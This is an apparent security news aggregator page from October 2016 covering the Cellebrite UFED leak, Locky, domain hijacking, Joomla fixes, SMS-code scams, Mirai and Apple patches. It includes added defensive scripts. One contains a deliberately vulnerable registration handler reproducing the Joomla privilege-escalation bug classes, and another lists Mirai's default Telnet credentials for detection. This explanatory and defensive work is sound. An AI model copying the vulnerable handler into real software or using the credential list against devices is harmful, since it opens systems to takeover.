The Israeli firm Cellebrite, which provides digital forensics tools and software to help law enforcement access mobile phones in investigations, has had its firmware and software leaked online.
Yes, you heard that right. Cellebrite's most sensitive in-house capabilities have been made public by one of its products' resellers, who is now distributing copies of Cellebrite's firmware and software for anyone to download.
The apparent reseller is McSira Professional Solutions, which hosts software for various versions of Cellebrite's Universal Forensic Extraction Device (UFED).
UFED is one of the company's key products that help investigators bypass the security mechanisms of mobile phones, especially iPhones, and extract all data and passwords from them.
For a look at Cellebrite's capabilities against iOS devices, you can watch the 2015 YouTube video in which one of the company's products unlocks an iPhone in a few hours.
Download Links to Cellebrite's Key Forensic Product
McSira is allowing anyone to download the firmware for the UFED Touch and UFED 4PC (PC version). The company is also hosting copies of UFED packages for different mobile phone brands, including Apple, Samsung, Blackberry, Nokia, and LG.
Besides this, McSira is also hosting copies of Cellebrite forensic software, such as the UFED Phone Detective, UFED Cloud Analyzer and Link Analyzer, which allows investigators to analyze seized data further.
McSira is likely offering these download links for firmware and software files so that its customers – which, according to its site, are "police, military and security agencies in the E.U. and other parts of the world" – can conveniently update their hardware to the latest version.
However, the company has also opened the door for researchers, hackers, and its competitors to download these leaked files, reverse-engineer them, and figure out how Cellebrite's tools break into mobile phones.
Researchers Start Examining the Leaked Software and Firmware
According to Joseph Cox, freelance security journalist for Motherboard, an unnamed researcher has already started examining the leaked files to disclose the kind of exploits Cellebrite uses to bypass even strong security mechanisms on mobile phones, as well as weaknesses in the implementation of affected phones that could be fixed.
Another researcher, Pedro Vilaça from SentinelOne, said he had already cracked some of the Cellebrite software and run it against an old iPad, though he said he needed to explore the leaked files further to better understand the software's capabilities.
"Doesn't seem to be trying to exploit things but just data extraction," Vilaça told Motherboard. "For example, I had to pair my device with iTunes for the logical extraction feature to work."
Mike Reilly, a PR firm representative who works with Cellebrite, said the McSira website's links "don't allow access to any of the solutions without a license key," meaning that downloaders need a key (code) given by Cellebrite or its reseller to run that software.
At the time of writing, McSira is hosting these files, but it is not clear how long the files will be hosted on its website.
McSira and Cellebrite have yet to comment on the matter.
Extortion viruses on the rise, now among the most widespread threats in the world
26.10.2016 Novinky/Bezpečnost Viruses
Malicious code from the ransomware family, as extortion viruses are known, has for the very first time reached the top ranks of the chart of the most widespread computer threats. In other words, cybercriminals are managing to smuggle these uninvited guests into other people's PCs more and more often. This follows from an analysis by the antivirus company Check Point.
The most widespread virus of all in September was Conficker, as Novinky reported earlier. [full story]
Second place belongs to the malicious code Sality, and third to the extortion virus. "For the very first time in our research, ransomware has made it into the Top 3 most widespread malware families. The Locky ransomware was responsible for 6 percent of all detected attacks worldwide during September," said David Řeháček, security expert at Check Point.
Overall, ransomware attacks rose by 13 percent in September. Locky in particular gives security experts a headache, because it uses fairly sophisticated encryption, similar to what financial institutions use to secure payments over the internet.
Do not pay the ransom
In the case of Locky, cybercriminals infect the system via an email with a Word attachment that contains a malicious macro. As soon as the user opens the file, the macro runs a script that downloads a malicious executable, which installs itself on the victim's computer and searches for files to encrypt. The user then does not even know that the attack began with the click on the email attachment.
The cybercriminals then usually try to give the owner of the infected machine the impression that they will regain access to their files after paying a fine, supposedly imposed for using illegal software and the like. This is one reason why many people have already paid the ransom.
Even after paying the ransom, however, users do not regain access to their data. Instead of paying the ransom, the virus must be uninstalled from the computer. In most cases, though, it is impossible to recover data that was not backed up.
Not only owners of classic computers should be wary of extortion viruses. Last June, security experts uncovered an uninvited guest that demanded a ransom on a mobile phone as well. [full story]
The Czech Republic is increasingly in hackers' sights
Together with the statistics on the most widespread virus threats, Check Point also published a ranking of the countries most often targeted by cyberattacks.
And for domestic users, this data is not positive at all. "In September the Czech Republic placed 72nd, a rise of 16 places and a move towards the less secure countries. Slovakia also moved 16 places towards the less secure countries and is now in 61st place," Řeháček stated.
"Conversely, Kazakhstan moved most markedly towards the safer countries, dropping 47 places to 55th. The largest move towards the more dangerous countries was recorded by Puerto Rico, which moved 55 places to 47th. Botswana, which jumped 19 places, took first place in the Threat Index," he concluded.
Simplify encryption for mobile communication
26.10.2016 SecurityWorld Mobile
OKSystem has introduced Babelbox, a mini-server for encrypted communication with Windows or macOS systems and with mobile devices on the iOS, Android and BlackBerry platforms.
The product ships as the pre-installed Babelnet application (Enterprise edition) on an HP EliteDesk 400 G2 mini PC with a licence for 5, 10 or 15 users. Pricing starts at CZK 42,750.
According to the vendor, Babelnet combines strong cryptographic algorithms and protocols to ensure the authenticity, confidentiality and integrity of messages and documents, both in transit and at rest on computers and mobile devices.
The Babelnet client is installed on mobile devices or computers and connects immediately to a server in the corporate network, to a Babelbox, or to the cloud. An on-premises installation allows straightforward oversight, integration, and management of users and devices.
Babelnet also supports simple integration with third-party applications (DMS, HR, CRM, ...) and thus provides automated, secure transfer of information and documents from corporate applications to users.
According to an OKSystem survey of 2,173 Czech lawyers, managers, top managers, company owners, shareholders and CEOs, 80% of the managers polled worry that someone is interested in obtaining information from their work, personal or corporate communications.
“Small companies often have no IT specialists of their own and need easily deployable, low-maintenance systems,” says Ivo Rosol, head of development and co-founder of OKsystem. According to him, the system his company has introduced secures communications even for the smallest businesses.
Babelbox features, according to the vendor:
Web admin console
Management and configuration
User and group accounts
Device management
Public key distribution
Integration API
Option to attach a USB LTE modem when the network is unavailable
Domain Hijacking – An Invisible and Destructive Threat We Should Watch For
26.10.2016 securityaffairs Hacking
Morphus Labs warns about another major threat: a domain hijacking incident, a threat that can completely subvert your information security strategy.
This week Morphus Labs warns about another major threat. Renato Marinho and Victor Pasknel handled a domain hijacking incident, a threat that can completely subvert an organization's information security strategy. In this article they describe how the incident was handled and how similar scenarios can be prevented.
Introduction
It's Saturday morning and you, the CSO of a large company, start receiving messages from various sources, including the press, reporting that all of your organization's Internet addresses are sending visitors to fake websites offering malicious content in the form of fake security modules and/or updates.
What looked like a website defacement turned out to be something much worse. On closer examination you realize that cybercriminals had in fact hijacked the organization's entire domain and pointed every address at fake websites designed to steal your customers' information and spread malicious code. Worst of all, nothing you could do on your own would fix the problem immediately.
In this article we describe the incident response to the scenario above and how this threat, which can subvert your entire security strategy and investment, can be mitigated with very simple actions.
Domain Name System (DNS) basics
To better understand what happened, it's important to understand some basic DNS concepts. If you are familiar with this subject, skip ahead to the Domain Hijacking section.
DNS stands for Domain Name System and is a foundation of the Internet. Every name we use daily to reach websites and other Internet services has to be translated to an IP (Internet Protocol) address; this translation, or resolution, between a name and an IP address is the main role of DNS servers.
DNS servers form a hierarchy: a resolution request is passed down it until the server responsible for resolving names in a given domain is reached. The root of this hierarchy, the invisible trailing dot (“.”) at the end of every Internet name, is served by a group of DNS servers distributed around the world. Those root servers know the IP addresses of the servers in charge of each top-level domain (TLD), such as “.com”. The “.com” servers in turn know the addresses of the DNS servers in charge of your company's domain, such as “yourdomain.com”, and so on.
For example, when someone asks for “www.yourdomain.com.”, the request goes to the root servers (“.”), which refer it to the “.com” servers, which refer it to your company's DNS servers, which finally resolve “www” and return the correct IP address.
The TLDs are operated by registry operators, also called Network Information Centers (NICs), which manage the registration of domain names within the domains they are responsible for. So the “.com” registry operator is the organization that holds the record of which DNS servers are in charge of resolving names under a domain like “yourcompany.com”.
Domain Hijacking
To register or manage a domain with a registry operator (or with a registrar acting on its behalf), you first have to create an account, basically a username and password, on its web portal. That account is used to set which DNS servers serve your domain, and those servers in turn point at the IP addresses of your website and e-mail servers.
Note that the credentials for the operator's portal are extremely sensitive. A malicious actor holding them could change any configuration of your domains, including the addresses of the DNS servers. In short, they could hijack your company's Internet domain and send its websites and e-mail to any address they chose.
In the incident we handled at Morphus Labs, that is exactly what happened. The attackers stole the registry operator credentials and changed the primary and secondary DNS server configuration to point at servers under their control. From then on, all of the company's customers were sent to a fake company website that urged them to download malicious content. We can only imagine what the criminals' next step would have been had they succeeded in spreading their malware.
Needless to say, the crooks changed the password after gaining access to the portal. In other words, they hijacked the domain and made its recovery dependent on the registry operator, and “manual” account recovery is usually neither easy nor fast.
The Incident Response
Unlike most cyber incidents, there is almost nothing you can do in your own infrastructure to reverse the situation, such as restoring backups or configurations. As in this incident, all servers were intact.
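As an added illustration, not part of the Morphus Labs article or of any tool they describe, the script below makes two points from the sections above concrete. First, it walks a constructed root → TLD → authoritative referral chain to show that whoever controls the delegation record at the registry controls where every name under the domain goes, even though the company's own DNS servers still hold the correct data. Second, it shows the kind of scheduled check a practitioner would run against WHOIS output to catch a changed delegation or missing registrar locks. All zone data, WHOIS text and names (yourcompany.com, ns1.evil-dns.example, the 198.51.100.0/24 and 203.0.113.0/24 addresses) are constructed for the example.

```python
import re

# --- Part 1: a toy iterative resolver over constructed referral data ---------
# Each parent zone hands out the nameservers of its children (a referral);
# only the last server in the chain holds the address records themselves.
REFERRALS = {
    ".":    {"com.": ["a.gtld-servers.net."]},
    "com.": {"yourcompany.com.": ["ns1.yourcompany.com.", "ns2.yourcompany.com."]},
}
ZONE_DATA = {
    # the company's own servers: correct, and untouched by the attacker
    "ns1.yourcompany.com.": {"www.yourcompany.com.": "203.0.113.10",
                             "mail.yourcompany.com.": "203.0.113.25"},
    "ns2.yourcompany.com.": {"www.yourcompany.com.": "203.0.113.10",
                             "mail.yourcompany.com.": "203.0.113.25"},
    # the attacker's server (constructed name): every name points at the attacker
    "ns1.evil-dns.example.": {"www.yourcompany.com.": "198.51.100.66",
                              "mail.yourcompany.com.": "198.51.100.66"},
}
# The hijack changes only the registry-side delegation for yourcompany.com.
HIJACKED_REFERRALS = {
    ".":    REFERRALS["."],
    "com.": {"yourcompany.com.": ["ns1.evil-dns.example."]},
}


def resolve(name, referrals, zone_data):
    """Follow referrals from the root down to the servers authoritative for
    `name`; return (zones visited, serving nameserver, IP or None)."""
    name = name if name.endswith(".") else name + "."
    labels = name.rstrip(".").split(".")
    # candidate zones from the root down: ".", "com.", "yourcompany.com.", ...
    zones = ["."] + [".".join(labels[i:]) + "." for i in range(len(labels) - 1, -1, -1)]
    visited, servers, current = ["."], None, "."
    for child in zones[1:]:
        delegated = referrals.get(current, {}).get(child)
        if delegated is None:      # no further delegation: `current` is authoritative
            break
        visited.append(child)
        servers, current = delegated, child
    if servers is None:
        return visited, None, None
    return visited, servers[0], zone_data.get(servers[0], {}).get(name)


# --- Part 2: a scheduled check against WHOIS output ---------------------------
# Constructed WHOIS text in the common "Key: value" layout, before and after
# the delegation was changed by someone holding the portal credentials.
WHOIS_BEFORE = """\
Domain Name: YOURCOMPANY.COM
Registrar: Example Registrar, Inc.
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Name Server: NS1.YOURCOMPANY.COM
Name Server: NS2.YOURCOMPANY.COM
"""
WHOIS_AFTER = """\
Domain Name: YOURCOMPANY.COM
Registrar: Example Registrar, Inc.
Domain Status: ok https://icann.org/epp#ok
Name Server: NS1.EVIL-DNS.EXAMPLE
"""
EXPECTED_NS = {"ns1.yourcompany.com", "ns2.yourcompany.com"}
REQUIRED_LOCKS = {"clientTransferProhibited", "clientUpdateProhibited",
                  "clientDeleteProhibited"}


def audit_whois(text, expected_ns, required_locks):
    """Compare the delegation and EPP status codes in `text` with what the
    domain owner expects; return a list of human-readable findings."""
    ns = {m.group(1).lower().rstrip(".")
          for m in re.finditer(r"^Name Server:\s*(\S+)", text, re.M)}
    status = {m.group(1) for m in re.finditer(r"^Domain Status:\s*(\S+)", text, re.M)}
    findings = []
    if ns != expected_ns:
        findings.append(f"nameservers changed: expected {sorted(expected_ns)}, got {sorted(ns)}")
    missing = required_locks - status
    if missing:
        findings.append(f"registrar locks missing: {sorted(missing)}")
    return findings


if __name__ == "__main__":
    print(resolve("www.yourcompany.com", REFERRALS, ZONE_DATA))
    print(resolve("www.yourcompany.com", HIJACKED_REFERRALS, ZONE_DATA))
    print(audit_whois(WHOIS_BEFORE, EXPECTED_NS, REQUIRED_LOCKS))
    print(audit_whois(WHOIS_AFTER, EXPECTED_NS, REQUIRED_LOCKS))
```

The first part is why none of the company's own servers needed to be touched: resolvers never reach them once the “.com” referral names the attacker's server. The second part is the cheap mitigation the article alludes to: a daily comparison of the registry-side nameservers against an expected list, plus a check that the client-side EPP locks are set, alerts within a day of a change instead of on a Saturday morning via the press. Enabling the registry-level lock that some registries offer (a server-side status that the portal account alone cannot clear) closes the gap further.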
Read the full article: https://www.linkedin.com/pulse/domain-hijacking-invisible-destructive-threat-we-should-marinho
Two Critical Vulnerabilities Patched in Joomla 3.6.4. Update it asap!
26.10.2016 securityaffairs Vulnerability
Joomla has released version 3.6.4, which fixes two critical account creation vulnerabilities in the popular CMS.
Recently we discussed attacks in the wild leveraging compromised websites running the Joomla CMS. In February, for example, security experts observed a spike in the number of compromised Joomla-based websites used in Admedia attacks.
This week a new release of the Joomla CMS, version 3.6.4, was published; it fixes two critical account creation vulnerabilities.
Both vulnerabilities are rated high severity; the Joomla team fixed both within a few days of the report.
The first flaw, tracked as CVE-2016-8870, could be exploited by an attacker to register on a website even when the registration has been disabled. The vulnerability affects the Joomla core in versions 3.4.4 through 3.6.3.
“Inadequate checks allows for users to register on a site when registration has been disabled.” states the description of the flaw published by Joomla.
The second flaw, tracked as CVE-2016-8869, can be exploited to register on a website with elevated privileges.
“Incorrect use of unfiltered data allows for users to register on a site with elevated privileges.” states the description of the flaw published by Joomla.
The flaw was reported by Davide Tampellini on October 21 and is caused by incorrect use of unfiltered data. Affected Joomla versions again range from 3.4.4 through 3.6.3.
The Joomla! Security Strike Team (JSST) urges administrators of websites running the CMS to update and patch their installations as soon as possible.
Now that the flaws have been publicly disclosed, criminals will try to exploit them to compromise websites and use them for illegal activities, so it is essential to apply the update without delay.
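The two Joomla descriptions quoted above ("inadequate checks" for a disabled registration path, "incorrect use of unfiltered data" for privilege assignment) are generic bug classes, so the example below shows them in a generic registration handler alongside its hardened form. This is an added illustration written for this page; it is not Joomla's code, does not reproduce the actual Joomla patch, and its group ids, config keys, request dicts and function names are invented.

```python
# Added example (not Joomla's code): a generic registration handler carrying the
# two bug classes fixed in Joomla 3.6.4, and its hardened replacement.
REGISTERED_GROUP = 2   # assumed id of the ordinary-member group
SUPER_USER_GROUP = 8   # assumed id of the administrator group
ALLOWED_FIELDS = {"username", "email", "password"}

CONFIG_CLOSED = {"allow_registration": False, "new_user_group": REGISTERED_GROUP}
CONFIG_OPEN = {"allow_registration": True, "new_user_group": REGISTERED_GROUP}

# Constructed requests. The attacker's one smuggles in a 'groups' field and
# arrives via a task name the "registration disabled" check does not expect.
ATTACKER_REQUEST = {
    "task": "user.register.alt",
    "username": "mallory",
    "email": "mallory@example.com",
    "password": "hunter2",
    "groups": [SUPER_USER_GROUP],
}
HONEST_REQUEST = {"task": "user.register", "username": "alice",
                  "email": "alice@example.com", "password": "correct horse"}


class RegistrationDisabled(Exception):
    pass


def register_vulnerable(request, config, users):
    """Flaw A (the CVE-2016-8870 class): the 'registration disabled' check is
    tied to one expected task name, so a request arriving by another path
    skips it.  Flaw B (the CVE-2016-8869 class): the request is copied into
    the account record unfiltered, so a client-supplied 'groups' list decides
    the new account's privileges."""
    if request.get("task") == "user.register" and not config["allow_registration"]:
        raise RegistrationDisabled("registration is disabled")
    account = {k: v for k, v in request.items() if k != "task"}   # unfiltered copy
    account.setdefault("groups", [config["new_user_group"]])
    users[account["username"]] = account
    return account


def register_hardened(request, config, users):
    """Check the policy on every path, copy only allow-listed fields, and let
    the server, never the client, decide which groups a new account joins."""
    if not config["allow_registration"]:
        raise RegistrationDisabled("registration is disabled")
    account = {k: request[k] for k in ALLOWED_FIELDS if k in request}
    missing = ALLOWED_FIELDS - account.keys()
    if missing:
        raise ValueError(f"missing fields: {sorted(missing)}")
    if account["username"] in users:
        raise ValueError("username already taken")
    account["groups"] = [config["new_user_group"]]     # server-side policy only
    users[account["username"]] = account
    return account


if __name__ == "__main__":
    print(register_vulnerable(ATTACKER_REQUEST, CONFIG_CLOSED, {}))   # succeeds, super user
    print(register_hardened(ATTACKER_REQUEST, CONFIG_OPEN, {}))       # ordinary member
```

The pattern to take away is the same for any CMS or framework: a policy check must sit on the one code path every registration goes through, not on the route you happen to expect, and fields that decide authorization (groups, roles, flags) are never read from the request at all. An allow-list of accepted fields also makes a future "mass assignment" of some other sensitive attribute impossible by construction.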
"Forward me this message": scammers try to dupe the gullible on Facebook
25.10.2016 Novinky/Security Social networks
Česká spořitelna has warned of a new wave of fraud spreading mainly through Facebook. With their messages the fraudsters try to obtain authorization codes for transactions made through internet banking.
Example of a fraudulent message
At first glance the requests to forward a confirmation SMS appear to come from real friends. In reality the attackers use hijacked and fake Facebook accounts; they are only posing as friends.
“The fraudster contacts the client from the profile of one of the client's friends, saying they have a problem with their phone. They then ask the client whether they may have an authorization SMS sent to the client's phone, and ask the client to forward it on,” Česká spořitelna representatives warned.
Never forward SMS messages
That is exactly where the catch lies. “In reality that SMS belongs to the client, and by forwarding it the client allows the fraudster to authorize payments from the client's own account. The real owner of the profile from which the fraudster contacts the client most likely has no idea the fraud is taking place,” the bank's statement says.
Users should not respond to such requests at all. “Never forward authorization SMS codes to anyone. If you have already done so, we recommend that you immediately contact our free information line on 800 207 207,” the bank's representatives noted.
It cannot be ruled out that fraudsters will try the same approach on customers of other financial institutions, or try the same style of attack over other communication channels. Caution is therefore in order.
Traps on Facebook
Attackers target Facebook quite often. Some time ago, for instance, they posted offers under the Česká spořitelna name promising a bonus of CZK 1,000 for using a new version of internet banking.
Fraudulent offer on Facebook
In reality there is of course no new version of internet banking. The cybercriminals merely use the offer on the social network to lure login credentials out of the gullible. They are then only a step away from emptying people's accounts or taking out a loan in their name.
Essentially all they then need is to smuggle a virus onto the victim's smartphone that lets them intercept the confirmation SMS messages. Dozens of such uninvited guests circulate on the Internet, so the risk of infection is by no means negligible.
Alternatively, they can simply ask for the confirmation message from a compromised Facebook account, as described at the start of this article.
Attackers can get around the bank's authorization SMS too. All they need is Facebook
25.10.2016 Živě.cz Mobile
Česká spořitelna warns of attackers who use Facebook to obtain internet banking authorization codes, which are normally delivered by text message. Even if attackers get through the login form into account management, for example via phishing, they still lack the confirmation codes that would let them move money to their own accounts.
US agency warns: two-factor verification via SMS is not secure
To obtain them they use a trivial trick on Facebook. They message the user claiming that their own message did not arrive and asking whether it can be sent to the victim's phone instead. The victim does receive an authorization SMS, but it carries the code for the victim's own account. If the victim forwards it to the attacker, nothing stands in the way of emptying the account. To make it more convincing, the attacker can use a stolen Facebook account, so the victim believes they really are talking to a friend.
Example of a Facebook message meant to lure the authorization code from the SMS out of the victim
(source: Česká spořitelna)
Similar scams, which combine social engineering with knowledge-based hacking, prompted a US government security agency this summer to declare SMS-based verification insufficient. Authenticator apps or biometric authentication are meant to replace it in future.
Beware of Hicurdismos, malware posing as Microsoft Security Essentials
25.10.2016 Živě.cz Viruses
Microsoft warns users on its blog about a threat named Hicurdismos. It is malicious software packaged as a fake installer for the Microsoft Security Essentials security suite.
Left: Microsoft's installer; right: the one carrying the malware
If a user downloads and installs the malware, it starts displaying a blue screen of death, which is of course also fake. Instead of the usual advice to restart the computer and so on, it shows a technical support phone number for "resolving" the problem. If an unsuspecting user actually calls it, the operator pushes them into downloading more malware or straight into paying.
The screen looks like an ordinary BSoD, but at the bottom there is a technical support phone number. The support line will ask for payment or for downloading further malware.
The problem will mainly affect users in the United States and Canada; Czech users should be put off by the foreign phone number. It is also worth noting that there is no need to download Microsoft Security Essentials on Windows 8.1 or Windows 10 at all, since they ship with the same security software in the form of Windows Defender.
WhatsApp Video Calling is Now Available for Android – Download Beta Version Now!
25.10.2016 thehackernews Android
WhatsApp is, without doubt, the largest end-to-end encrypted messaging network, allowing over a billion users to send messages, photos, videos, voice messages, documents and calls that are protected from falling into the wrong hands.
And now WhatsApp is rolling out a much-awaited feature in new beta versions of its Android app: video calling.
Beta version 2.16.318 of WhatsApp adds the ability to make video calls.
To start a video call, pull up a contact in the WhatsApp app, tap the call icon and choose "Video Call." You can also start one directly from the Calls tab.
Video calls only work if both the caller and the receiver have a beta build of WhatsApp that supports the feature. If not, you will see an error message saying your contact needs to update their app.
Download the latest WhatsApp for Android build from APKMirror and give it a try. Bear in mind that sideloading an APK from a third-party mirror bypasses the Play Store's checks, so verify that the package's signing certificate matches the official app's before installing it.
For now the video calling feature is limited to WhatsApp's recent beta builds, reports Android Police, which first spotted it. So you either need to install the APK linked above or sign up as a beta tester and update WhatsApp (Beta) directly from the Google Play Store.
If the feature still doesn't appear, there is a possible trick you can try to activate it.
Possible Trick to Activate WhatsApp Video Calling Feature
You simply need to follow these steps:
Backup all your chats,
Wipe WhatsApp data,
Log in again on WhatsApp.
This trick has helped some users activate video calling, but make sure your chat backup completed successfully first.
Reportedly, the video calling feature also offers an option to mute the call, and you can switch between the front and rear cameras just as in other video calling apps. The app's call history now lists both video and voice calls.
With a stable release to over a billion users expected in the coming weeks, WhatsApp video calling could effectively undercut Google's video calling app Duo, released only a few months ago.
Chinese Electronics Firm to Recall its Smart Cameras recently used to Take Down Internet
25.10.2016 thehackernews Security
You might be surprised to learn that your security cameras, Internet-connected toasters and refrigerators may have inadvertently taken part in the massive cyber attack that took down a large portion of the Internet on Friday.
That's because of massive Distributed Denial of Service (DDoS) attacks against Dyn, a major domain name system (DNS) provider that many sites and services use as their upstream DNS provider to turn human-readable names into IP addresses.
The result we all know:
Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal and Airbnb were among hundreds of sites and services rendered inaccessible to millions of people worldwide for several hours.
Why and How the Deadliest DDoS Attack Happened
It was reported that Mirai bots were used in the massive DDoS attack against Dyn, but that they were "separate and distinct" from the bots used in the record-breaking DDoS attack against the French Internet service and hosting provider OVH.
Here's why: initially the Mirai source code was available only to the few who knew of the underground hacking forum where it was released.
But later, the link to the Mirai source code received huge exposure from thousands of media websites after journalist Brian Krebs first reported on it on his blog.
Thanks to that worldwide coverage, copycat and unskilled hackers are now building their own botnets by compromising millions of smart devices, both to launch DDoS attacks and to make money by renting them out as DDoS-for-hire services.
Mirai is designed to scan for Internet of Things (IoT) devices (mostly routers, security cameras, DVRs and IP cameras, Linux servers, and devices running BusyBox) that still use their default Telnet passwords. It enlists vast numbers of these devices into a botnet that is then used to launch DDoS attacks.
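The paragraph above describes the behaviour that is easiest to catch from the defender's side: a single source walking through the short list of factory username/password pairs over Telnet, and a login that succeeds with one of them. The script below is an added example, not part of the article or of Mirai, that turns that into detection logic over constructed Telnet login logs. The log line format is an invented telnetd style, the addresses are from documentation ranges, and the credential set is a partial subset of the pairs carried by the published Mirai source, labelled as such in the code.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A subset of the username/password pairs carried by the published Mirai source
# (the full list is longer; extend it from the real code before relying on it).
MIRAI_DEFAULTS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "xmhdipc"), ("root", "default"), ("root", "juantech"),
    ("root", "123456"), ("root", "54321"), ("support", "support"), ("root", "root"),
    ("admin", "password"), ("root", "12345"), ("user", "user"), ("root", "pass"),
    ("ubnt", "ubnt"), ("root", "7ujMko0vizxv"), ("root", "7ujMko0admin"),
}

# Constructed log lines in an invented telnetd format; the addresses come from
# documentation ranges and the attempts are made up for the example.
SAMPLE_LOG = """\
2016-10-21T11:02:13Z telnetd[1201]: login attempt from 198.51.100.7 user=root pass=xc3511 result=fail
2016-10-21T11:02:14Z telnetd[1201]: login attempt from 198.51.100.7 user=root pass=vizxv result=fail
2016-10-21T11:02:15Z telnetd[1202]: login attempt from 192.0.2.9 user=root pass=admin result=fail
2016-10-21T11:02:16Z telnetd[1201]: login attempt from 198.51.100.7 user=admin pass=admin result=fail
2016-10-21T11:02:18Z telnetd[1203]: login attempt from 203.0.113.5 user=admin pass=S3cure!Pass result=fail
2016-10-21T11:02:19Z telnetd[1201]: login attempt from 198.51.100.7 user=root pass=888888 result=ok
2016-10-21T11:02:25Z telnetd[1203]: login attempt from 203.0.113.5 user=admin pass=S3cure!Pass2 result=ok
garbage line that does not match the format
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) telnetd\[\d+\]: login attempt from (?P<src>[\d.]+) "
    r"user=(?P<user>\S*) pass=(?P<pw>\S*) result=(?P<res>ok|fail)$")


def parse(lines):
    """Turn matching log lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return events


def detect(events, window=timedelta(seconds=60), min_pairs=3):
    """Flag sources that try >= min_pairs distinct Mirai default pairs within
    `window` (a scanner), and any login that succeeded with a default pair
    (a device still on factory credentials, i.e. the next bot)."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    scanners, compromised = {}, []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for i, e in enumerate(evs):
            pair = (e["user"], e["pw"])
            if e["res"] == "ok" and pair in MIRAI_DEFAULTS:
                compromised.append((src, e["user"], e["pw"]))
            # distinct default pairs this source tried in the window ending at e
            tried = {(x["user"], x["pw"]) for x in evs[:i + 1]
                     if x["ts"] >= e["ts"] - window
                     and (x["user"], x["pw"]) in MIRAI_DEFAULTS}
            if len(tried) >= min_pairs:
                scanners[src] = max(scanners.get(src, 0), len(tried))
    return {"scanners": scanners, "compromised": compromised}


if __name__ == "__main__":
    print(detect(parse(SAMPLE_LOG.splitlines())))
```

A hit in `compromised` is the actionable one: it names a device on your network that accepted a factory credential, so rebooting it (which clears Mirai from memory) buys only minutes unless the password is changed or the device is taken off the Internet. A hit in `scanners` is useful for blocking, but note that Mirai-infected devices scan from residential addresses in the thousands, so the per-source view mainly tells you the scanning has reached you.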
Chinese Firm Admits Its Hacked DVRs and Cameras Were Behind Largest DDoS Attack
More such attacks are expected, and they will not stop until IoT manufacturers take the security of these Internet-connected devices seriously.
One such manufacturer is the Chinese firm Hangzhou Xiongmai Technology, which admitted that its products, DVRs and internet-connected cameras, inadvertently played a role in Friday's massive attack against Dyn.
Mirai runs only in memory, so it can easily be removed from an infected device by rebooting it, but the device will be reinfected within minutes if its owner and manufacturer do not take proper measures to protect it.
Worse, some of these devices, Xiongmai's among them, cannot be protected at all because of hard-coded passwords and firmware that was built in a way that does not allow easy updates.
"Mirai is a huge disaster for the Internet of Things," the company confirmed to IDG News. "[We] have to admit that our products also suffered from hacker's break-in and illegal use."
The company claimed to have rolled out patches for the weak default passwords that allowed Mirai to infect its products and use them in the massive DDoS attack against Dyn.
However, Xiongmai products running older firmware remain vulnerable. To address this, the company has advised customers to update their firmware and change the default credentials.
Xiongmai also said in a statement on its official microblog that it would recall some of its earlier products, specifically webcam models sold in the US, and send customers a patch for products made before April last year.
Hackers are selling IoT-based Botnet capable of 1 Tbps DDoS Attack
Even worse is expected:
Friday's DDoS attack, which made a large part of the Internet unreachable in the U.S., is just the beginning: hackers have started selling access to a huge army of hacked IoT devices built to launch attacks capable of severely disrupting any web service.
The seller claimed the botnet could generate 1 terabit per second of traffic, almost as much as the record DDoS attack against OVH earlier this month, Forbes reported.
Anyone could buy 50,000 bots for $4,600 and 100,000 bots for $7,500, which can be combined to overwhelm targets with traffic.
Hacker groups have long sold access to botnets as DDoS weapons for hire, like Lizard Squad's infamous Lizard Stresser, but those botnets largely consisted of compromised home routers rather than IoT devices like connected cameras, toasters, fridges and kettles, which are now available in bulk.
Separately, a hacking group calling itself New World Hackers has claimed responsibility for Friday's attacks, though this has not been confirmed.
New World Hackers is the same group that briefly knocked the BBC offline last year. It claims to be a hacktivist collective with members in China, Russia and India.
Who was behind Friday's attack remains unclear. The US Department of Homeland Security (DHS) and the FBI are investigating the DDoS attacks on Dyn, but neither agency has yet speculated on who might be responsible.
The Dyn attack has shown the danger of IoT botnets: a wake-up call for IoT manufacturers to start building security into their products, and for end users to attend to the basic safety of their connected devices.
Warning! Your iPhone Can Get Hacked Just by Opening a JPEG Image, PDF or Font File
25.10.2016 thehackernews Apple
What's worse than knowing that innocent-looking JPEGs, PDFs and font files can hijack your iPhone, iPad or iPod?
Yes, attackers can remotely take over a vulnerable iOS device: all they need is to trick you into viewing a maliciously crafted JPEG or PDF file on a website or in an e-mail, which lets them execute code on the device.
That's a serious flaw (CVE-2016-4673), but the good news is that Apple has released iOS 10.1 for iPhones and iPads to address this remote code execution bug alongside a set of other fixes.
And now that the patch is out, attackers will surely look for unpatched Apple devices to exploit and take control of.
So users running older versions of iOS are advised to update their devices to iOS 10.1 as soon as possible.
Besides this remote code execution flaw, iOS 10.1 includes fixes for 11 security flaws in the firmware for the iPhone, iPad and iPod touch.
Those include local code execution vulnerabilities, a remote code execution bug in WebKit (CVE-2016-4677), and a flaw in Contacts (CVE-2016-4686) that would allow an application to read Address Book details even after access had been revoked.
To update your iOS device go to Settings → General → Software Update.
Security Updates for Mac, Apple Watch, and AppleTV
Apple has also released security updates for Mac PCs, Apple Watches and Apple TVs.
Mac users are advised to update to macOS Sierra 10.12.1, which includes fixes for 16 CVE-listed vulnerabilities.
Those include the same image-handling bug (CVE-2016-4673), a denial of service (DoS) bug in Nvidia graphics drivers, a bug that exposed the length of user passwords, and remote code execution (RCE) flaws that could be triggered by font and PDF files, among others.
Meanwhile, Apple Watch users are advised to update to watchOS 3.1, which fixes 8 security flaws.
These include two vulnerabilities in sandbox profiles that could allow third-party apps to view image libraries and sound files without permission.
Apple TV users are also advised to update to tvOS 10.0.1, which patches 10 vulnerabilities, including the WebKit remote code execution flaw, the sandbox profile flaws and the CoreGraphics JPEG flaw.
So get your Apple devices patched before attackers catch up with you.
The German parliament passes a controversial surveillance law
25.10.2016 securityaffairs BigBrothers
